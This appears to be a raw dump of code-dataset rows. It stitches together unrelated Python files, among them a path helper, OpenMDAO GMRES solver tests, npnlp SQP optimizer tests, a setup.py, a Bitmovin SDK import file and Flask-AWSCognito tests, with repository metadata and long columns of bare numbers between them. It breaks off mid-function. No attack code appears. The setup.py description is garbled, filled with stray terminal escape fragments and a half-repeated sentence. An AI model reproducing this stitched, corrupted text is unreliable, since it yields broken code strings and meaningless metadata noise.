] | null | null | null |
tests/helper.py
|
peacemaker07/jawsug_sonic_midnight_jaws
|
59aa5b9c3222c76e76e49093555d9f628f9ec225
|
[
"MIT"
] | null | null | null |
import os
def get_abspath():
return os.path.abspath(os.path.dirname(os.path.abspath(__file__)))
| 17
| 70
| 0.735294
| 16
| 102
| 4.375
| 0.5625
| 0.257143
| 0.371429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 102
| 5
| 71
| 20.4
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 9
|
918d4e2ff1d66e3446c3ab3aa249312e8f6c8d59
| 19,159
|
py
|
Python
|
openmdao/solvers/test/test_scipy_gmres.py
|
naylor-b/OpenMDAO1
|
49d82f6601b33db9bdcf7d146d030d55e3b62ef4
|
[
"Apache-2.0"
] | 17
|
2018-01-11T20:13:59.000Z
|
2022-03-22T03:46:05.000Z
|
openmdao/solvers/test/test_scipy_gmres.py
|
naylor-b/OpenMDAO1
|
49d82f6601b33db9bdcf7d146d030d55e3b62ef4
|
[
"Apache-2.0"
] | 6
|
2017-10-19T23:14:14.000Z
|
2020-11-22T17:30:57.000Z
|
openmdao/solvers/test/test_scipy_gmres.py
|
naylor-b/OpenMDAO1
|
49d82f6601b33db9bdcf7d146d030d55e3b62ef4
|
[
"Apache-2.0"
] | 10
|
2018-04-12T22:13:33.000Z
|
2020-05-07T10:02:59.000Z
|
""" Unit test for the Scipy GMRES linear solver. """
import unittest
import numpy as np
from openmdao.api import Group, Problem, IndepVarComp, ScipyGMRES, \
DirectSolver, ExecComp, LinearGaussSeidel, AnalysisError
from openmdao.test.converge_diverge import ConvergeDiverge, SingleDiamond, \
ConvergeDivergeGroups, SingleDiamondGrouped
from openmdao.test.sellar import SellarDerivativesGrouped
from openmdao.test.simple_comps import SimpleCompDerivMatVec, FanOut, FanIn, \
FanOutGrouped, DoubleArrayComp, \
FanInGrouped, ArrayComp2D, FanOutAllGrouped
from openmdao.test.util import assert_rel_error
from openmdao.util.options import OptionsDictionary
class TestScipyGMRES(unittest.TestCase):
def test_simple_matvec(self):
group = Group()
group.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
group.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_simple_matvec_subbed(self):
group = Group()
group.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = Group()
prob.root.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
prob.root.add('sub', group, promotes=['*'])
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='fd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_simple_matvec_subbed_like_multipoint(self):
group = Group()
group.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = Group()
prob.root.add('sub', group, promotes=['*'])
prob.root.sub.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='fd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='fd', return_format='array')
assert_rel_error(self, J[0][0], 2.0, 1e-6)
def test_array2D(self):
group = Group()
group.add('x_param', IndepVarComp('x', np.ones((2, 2))), promotes=['*'])
group.add('mycomp', ArrayComp2D(), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
Jbase = prob.root.mycomp._jacobian_cache
diff = np.linalg.norm(J['y']['x'] - Jbase['y', 'x'])
assert_rel_error(self, diff, 0.0, 1e-8)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
diff = np.linalg.norm(J['y']['x'] - Jbase['y', 'x'])
assert_rel_error(self, diff, 0.0, 1e-8)
def test_double_arraycomp(self):
# Mainly testing a bug in the array return for multiple arrays
group = Group()
group.add('x_param1', IndepVarComp('x1', np.ones((2))), promotes=['*'])
group.add('x_param2', IndepVarComp('x2', np.ones((2))), promotes=['*'])
group.add('mycomp', DoubleArrayComp(), promotes=['*'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
Jbase = group.mycomp.JJ
J = prob.calc_gradient(['x1', 'x2'], ['y1', 'y2'], mode='fwd',
return_format='array')
diff = np.linalg.norm(J - Jbase)
assert_rel_error(self, diff, 0.0, 1e-8)
J = prob.calc_gradient(['x1', 'x2'], ['y1', 'y2'], mode='fd',
return_format='array')
diff = np.linalg.norm(J - Jbase)
assert_rel_error(self, diff, 0.0, 1e-8)
J = prob.calc_gradient(['x1', 'x2'], ['y1', 'y2'], mode='rev',
return_format='array')
diff = np.linalg.norm(J - Jbase)
assert_rel_error(self, diff, 0.0, 1e-8)
def test_simple_in_group_matvec(self):
group = Group()
sub = group.add('sub', Group(), promotes=['x', 'y'])
group.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
sub.add('mycomp', SimpleCompDerivMatVec(), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_simple_jac(self):
group = Group()
group.add('x_param', IndepVarComp('x', 1.0), promotes=['*'])
group.add('mycomp', ExecComp(['y=2.0*x']), promotes=['x', 'y'])
prob = Problem()
prob.root = group
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(['x'], ['y'], mode='fwd', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
J = prob.calc_gradient(['x'], ['y'], mode='rev', return_format='dict')
assert_rel_error(self, J['y']['x'][0][0], 2.0, 1e-6)
def test_fan_out(self):
prob = Problem()
prob.root = FanOut()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp2.y', "comp3.y"]
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p.x'][0][0], 15.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p.x'][0][0], 15.0, 1e-6)
def test_fan_out_grouped(self):
prob = Problem()
prob.root = FanOutGrouped()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['sub.comp2.y', "sub.comp3.y"]
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['sub.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub.comp3.y']['p.x'][0][0], 15.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['sub.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub.comp3.y']['p.x'][0][0], 15.0, 1e-6)
def test_fan_in(self):
prob = Problem()
prob.root = FanIn()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p1.x1', 'p2.x2']
unknown_list = ['comp3.y']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
def test_fan_in_grouped(self):
prob = Problem()
prob.root = FanInGrouped()
prob.root.ln_solver = ScipyGMRES()
indep_list = ['p1.x1', 'p2.x2']
unknown_list = ['comp3.y']
prob.setup(check=False)
prob.run()
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp3.y']['p1.x1'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['comp3.y']['p2.x2'][0][0], 35.0, 1e-6)
def test_converge_diverge(self):
prob = Problem()
prob.root = ConvergeDiverge()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp7.y1']
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
def test_analysis_error(self):
prob = Problem()
prob.root = ConvergeDiverge()
prob.root.ln_solver = ScipyGMRES()
prob.root.ln_solver.options['maxiter'] = 2
prob.root.ln_solver.options['err_on_maxiter'] = True
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp7.y1']
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
try:
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
except AnalysisError as err:
self.assertEqual(str(err), "Solve in '': ScipyGMRES failed to converge after 2 iterations")
else:
self.fail("expected AnalysisError")
def test_converge_diverge_groups(self):
prob = Problem()
prob.root = ConvergeDivergeGroups()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
indep_list = ['p.x']
unknown_list = ['comp7.y1']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
def test_single_diamond(self):
prob = Problem()
prob.root = SingleDiamond()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp4.y1', 'comp4.y2']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
def test_single_diamond_grouped(self):
prob = Problem()
prob.root = SingleDiamondGrouped()
prob.root.ln_solver = ScipyGMRES()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['comp4.y1', 'comp4.y2']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp4.y1']['p.x'][0][0], 25, 1e-6)
assert_rel_error(self, J['comp4.y2']['p.x'][0][0], -40.5, 1e-6)
def test_sellar_derivs_grouped(self):
prob = Problem()
prob.root = SellarDerivativesGrouped()
prob.root.mda.nl_solver.options['atol'] = 1e-12
prob.setup(check=False)
prob.run()
# Just make sure we are at the right answer
assert_rel_error(self, prob['y1'], 25.58830273, .00001)
assert_rel_error(self, prob['y2'], 12.05848819, .00001)
indep_list = ['x', 'z']
unknown_list = ['obj', 'con1', 'con2']
Jbase = {}
Jbase['con1'] = {}
Jbase['con1']['x'] = -0.98061433
Jbase['con1']['z'] = np.array([-9.61002285, -0.78449158])
Jbase['con2'] = {}
Jbase['con2']['x'] = 0.09692762
Jbase['con2']['z'] = np.array([1.94989079, 1.0775421 ])
Jbase['obj'] = {}
Jbase['obj']['x'] = 2.98061392
Jbase['obj']['z'] = np.array([9.61001155, 1.78448534])
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
# Cheat a bit so I can twiddle mode
OptionsDictionary.locked = False
prob.root.deriv_options['form'] = 'central'
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
class TestScipyGMRESPreconditioner(unittest.TestCase):
def test_sellar_derivs_grouped_precon(self):
prob = Problem()
prob.root = SellarDerivativesGrouped()
prob.root.mda.nl_solver.options['atol'] = 1e-12
prob.root.ln_solver.preconditioner = LinearGaussSeidel()
prob.root.mda.ln_solver = DirectSolver()
prob.setup(check=False)
prob.run()
# Just make sure we are at the right answer
assert_rel_error(self, prob['y1'], 25.58830273, .00001)
assert_rel_error(self, prob['y2'], 12.05848819, .00001)
indep_list = ['x', 'z']
unknown_list = ['obj', 'con1', 'con2']
Jbase = {}
Jbase['con1'] = {}
Jbase['con1']['x'] = -0.98061433
Jbase['con1']['z'] = np.array([-9.61002285, -0.78449158])
Jbase['con2'] = {}
Jbase['con2']['x'] = 0.09692762
Jbase['con2']['z'] = np.array([1.94989079, 1.0775421 ])
Jbase['obj'] = {}
Jbase['obj']['x'] = 2.98061392
Jbase['obj']['z'] = np.array([9.61001155, 1.78448534])
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
for key1, val1 in Jbase.items():
for key2, val2 in val1.items():
assert_rel_error(self, J[key1][key2], val2, .00001)
def test_converge_diverge_groups(self):
prob = Problem()
prob.root = ConvergeDivergeGroups()
prob.root.ln_solver = ScipyGMRES()
prob.root.ln_solver.preconditioner = LinearGaussSeidel()
prob.root.sub1.ln_solver = DirectSolver()
prob.root.sub3.ln_solver = DirectSolver()
prob.setup(check=False)
prob.run()
# Make sure value is fine.
assert_rel_error(self, prob['comp7.y1'], -102.7, 1e-6)
indep_list = ['p.x']
unknown_list = ['comp7.y1']
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='fd', return_format='dict')
assert_rel_error(self, J['comp7.y1']['p.x'][0][0], -40.75, 1e-6)
def test_fan_out_all_grouped(self):
prob = Problem()
prob.root = FanOutAllGrouped()
prob.root.ln_solver = ScipyGMRES()
prob.root.ln_solver.preconditioner = LinearGaussSeidel()
prob.root.sub1.ln_solver = DirectSolver()
prob.root.sub2.ln_solver = DirectSolver()
prob.root.sub3.ln_solver = DirectSolver()
prob.setup(check=False)
prob.run()
indep_list = ['p.x']
unknown_list = ['sub2.comp2.y', "sub3.comp3.y"]
J = prob.calc_gradient(indep_list, unknown_list, mode='fwd', return_format='dict')
assert_rel_error(self, J['sub2.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub3.comp3.y']['p.x'][0][0], 15.0, 1e-6)
J = prob.calc_gradient(indep_list, unknown_list, mode='rev', return_format='dict')
assert_rel_error(self, J['sub2.comp2.y']['p.x'][0][0], -6.0, 1e-6)
assert_rel_error(self, J['sub3.comp3.y']['p.x'][0][0], 15.0, 1e-6)
if __name__ == "__main__":
unittest.main()
| 37.788955
| 103
| 0.57717
| 2,702
| 19,159
| 3.932272
| 0.07846
| 0.060141
| 0.093553
| 0.118588
| 0.869929
| 0.847624
| 0.828329
| 0.826824
| 0.817412
| 0.804329
| 0
| 0.058972
| 0.237069
| 19,159
| 506
| 104
| 37.863636
| 0.667921
| 0.016963
| 0
| 0.80274
| 0
| 0
| 0.079118
| 0
| 0
| 0
| 0
| 0
| 0.19726
| 1
| 0.054795
| false
| 0
| 0.021918
| 0
| 0.082192
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
918e01176237ccd1cd5e9e77876e6b15d1a0c9e1
| 2,173
|
py
|
Python
|
npnlp/tests/test_sqp.py
|
msparapa/npnlp
|
9158f47def6e6583e662b913ae46be49dafca4f8
|
[
"MIT"
] | null | null | null |
npnlp/tests/test_sqp.py
|
msparapa/npnlp
|
9158f47def6e6583e662b913ae46be49dafca4f8
|
[
"MIT"
] | null | null | null |
npnlp/tests/test_sqp.py
|
msparapa/npnlp
|
9158f47def6e6583e662b913ae46be49dafca4f8
|
[
"MIT"
] | null | null | null |
from npnlp import minimize
import numpy as np
tol = 1e-6
def test_sqp1():
def J(x):
return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])
x0 = np.array([0.5, 3.0])
nil = np.array([])
out = minimize(J, x0, Aeq=np.array([[1,0]]), beq=np.array([1]), method='SQP')
assert abs(out['x'][0] - 1) < tol
assert abs(out['x'][1] - 0.5) < tol
assert abs(out['grad'][0] - 3) < tol
assert abs(out['grad'][1] - 0) < tol
assert abs(out['kkt'].equality_linear[0] + 3) < tol
def test_sqp2():
def J(x):
return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])
x0 = np.array([0.5, 3.0])
nil = np.array([])
out = minimize(J, x0, A=np.array([[1,0]]), b=np.array([-1]), method='SQP')
assert abs(out['x'][0] + 1) < tol
assert abs(out['x'][1] - 0.5) < tol
assert abs(out['grad'][0] + 3) < tol
assert abs(out['grad'][1] - 0) < tol
assert abs(out['kkt'].inequality_linear[0] - 3) < tol
def test_sqp3():
def J(x):
return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])
def eq_con(x, kkt):
return np.array([1 - 2 * x[0] * x[1] / 3, (3 * x[0] ** 2 - 4 * x[1]) / 3 + 1])
x0 = np.array([0.5, 3.0])
nil = np.array([])
out = minimize(J, x0, nonlconeq=eq_con, method='SQP')
assert abs(out['x'][0] - 1) < tol
assert abs(out['x'][1] - 1.5) < tol
assert abs(out['grad'][0] - 1) < tol
assert abs(out['grad'][1] - 2) < tol
assert abs(out['kkt'].equality_nonlinear[0] - 2) < tol
assert abs(out['kkt'].equality_nonlinear[1] - 0.5) < tol
def test_sqp4():
def J(x):
return np.array([x[0] ** 4 + x[1] ** 2 - x[0] ** 2 * x[1]])
def eq_con(x, l):
return np.array([1 - 2 * x[0] * x[1] / 3, (3 * x[0] ** 2 - 4 * x[1]) / 3 + 1])
x0 = np.array([0.5, 3.0])
nil = np.array([])
out = minimize(J, x0, nonlconineq=eq_con, method='SQP')
assert abs(out['x'][0] - 1) < tol
assert abs(out['x'][1] - 1.5) < tol
assert abs(out['grad'][0] - 1) < tol
assert abs(out['grad'][1] - 2) < tol
assert abs(out['kkt'].inequality_nonlinear[0] - 2) < tol
assert abs(out['kkt'].inequality_nonlinear[1] - 0.5) < tol
| 33.430769
| 86
| 0.503451
| 399
| 2,173
| 2.706767
| 0.120301
| 0.183333
| 0.244444
| 0.25
| 0.885185
| 0.874074
| 0.824074
| 0.824074
| 0.72037
| 0.72037
| 0
| 0.084507
| 0.248504
| 2,173
| 64
| 87
| 33.953125
| 0.576852
| 0
| 0
| 0.584906
| 0
| 0
| 0.032214
| 0
| 0
| 0
| 0
| 0
| 0.415094
| 1
| 0.188679
| false
| 0
| 0.037736
| 0.113208
| 0.339623
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 10
|
37d5fc60b60eb105b0531eb3444e6d04538009c9
| 1,301
|
py
|
Python
|
setup.py
|
vyathakavilocana/AIatNCStateSpring2021WeedDetectionProjectRepository
|
59616788360d4fbb7dee4dc65a0780fcd85e2c0b
|
[
"MIT"
] | null | null | null |
setup.py
|
vyathakavilocana/AIatNCStateSpring2021WeedDetectionProjectRepository
|
59616788360d4fbb7dee4dc65a0780fcd85e2c0b
|
[
"MIT"
] | null | null | null |
setup.py
|
vyathakavilocana/AIatNCStateSpring2021WeedDetectionProjectRepository
|
59616788360d4fbb7dee4dc65a0780fcd85e2c0b
|
[
"MIT"
] | null | null | null |
from setuptools import find_packages, setup
setup(
name='src',
packages=find_packages(),
version='0.1.0',
description='This Spring 2021 AI at NC State project repository contains all the code for the Weed Detection project. Utilizing images and other geospatial data, it [D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D machine learning prototyping code for the Weed Detection project. Utilizing images and other geospatial data, it seeks to harness the power of applied AI models to sense where weeds are amongst g[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[D[C[C[C[C[C[D[D[D[D[D[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[C[distinguish weeds from [D[D[D[D[D[D endemic to North Carolina from the grasses occupying the terrain of the state as well as provide alternative productive uses for the weeds (foraging, etc).',
author='AI at NC State (Pratham Chhabria, Yuseung Kim, Jiale Hu, Sumitosh Pal, Prachi Jadhav, Jared Arriola) and Clemson AI Club (Jeffrey Wang)',
license='MIT',
)
| 118.272727
| 1,010
| 0.61568
| 436
| 1,301
| 2.188073
| 0.201835
| 0.259958
| 0.383648
| 0.503145
| 0.468553
| 0.468553
| 0.468553
| 0.468553
| 0.468553
| 0.468553
| 0
| 0.00605
| 0.110684
| 1,301
| 10
| 1,011
| 130.1
| 0.684529
| 0
| 0
| 0
| 0
| 0.222222
| 0.873943
| 0.352037
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
37fd6fd8be4ae4ec501c6e40e7abb780aa34863d
| 360
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/muxings/progressive_webm/drm/speke/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/muxings/progressive_webm/drm/speke/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/muxings/progressive_webm/drm/speke/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.encodings.muxings.progressive_webm.drm.speke.speke_api import SpekeApi
from bitmovin_api_sdk.encoding.encodings.muxings.progressive_webm.drm.speke.customdata.customdata_api import CustomdataApi
from bitmovin_api_sdk.encoding.encodings.muxings.progressive_webm.drm.speke.speke_drm_list_query_params import SpekeDrmListQueryParams
| 90
| 134
| 0.905556
| 49
| 360
| 6.346939
| 0.387755
| 0.115756
| 0.144695
| 0.173633
| 0.659164
| 0.659164
| 0.659164
| 0.659164
| 0.659164
| 0.659164
| 0
| 0
| 0.033333
| 360
| 3
| 135
| 120
| 0.893678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5303c90dea5fb99fa86c3e94754318be685fe5c8
| 2,891
|
py
|
Python
|
source/Flask-AWSCognito/tests/test_plugin.py
|
Frankovich73/tag-tamer-deployment-test
|
8267ff32bcae8de6b23d8566b719e00dc4879890
|
[
"Apache-2.0"
] | null | null | null |
source/Flask-AWSCognito/tests/test_plugin.py
|
Frankovich73/tag-tamer-deployment-test
|
8267ff32bcae8de6b23d8566b719e00dc4879890
|
[
"Apache-2.0"
] | null | null | null |
source/Flask-AWSCognito/tests/test_plugin.py
|
Frankovich73/tag-tamer-deployment-test
|
8267ff32bcae8de6b23d8566b719e00dc4879890
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from flask_awscognito import AWSCognitoAuthentication
@pytest.mark.usefixtures("set_env")
def test_get_access_token(
app, cognito_service_test_factory, token_service_test_factory
):
plugin = AWSCognitoAuthentication(
app,
_token_service_factory=token_service_test_factory,
_cognito_service_factory=cognito_service_test_factory,
)
with app.app_context():
assert plugin.token_service
assert plugin.cognito_service
req_args = {"code": "code", "state": "dc0de448b88af41d1cd06387ac2d5102"}
plugin.get_access_token(req_args)
plugin.cognito_service.exchange_code_for_token.assert_called_with("code")
@pytest.mark.usefixtures("set_env")
def test_get_user_info(
app, cognito_service_test_factory, token_service_test_factory, test_access_token
):
plugin = AWSCognitoAuthentication(
app,
_token_service_factory=token_service_test_factory,
_cognito_service_factory=cognito_service_test_factory,
)
with app.app_context():
assert plugin.token_service
assert plugin.cognito_service
plugin.get_user_info(test_access_token)
plugin.cognito_service.get_user_info.assert_called_with(test_access_token)
@pytest.mark.usefixtures("set_env")
def test_no_auth(
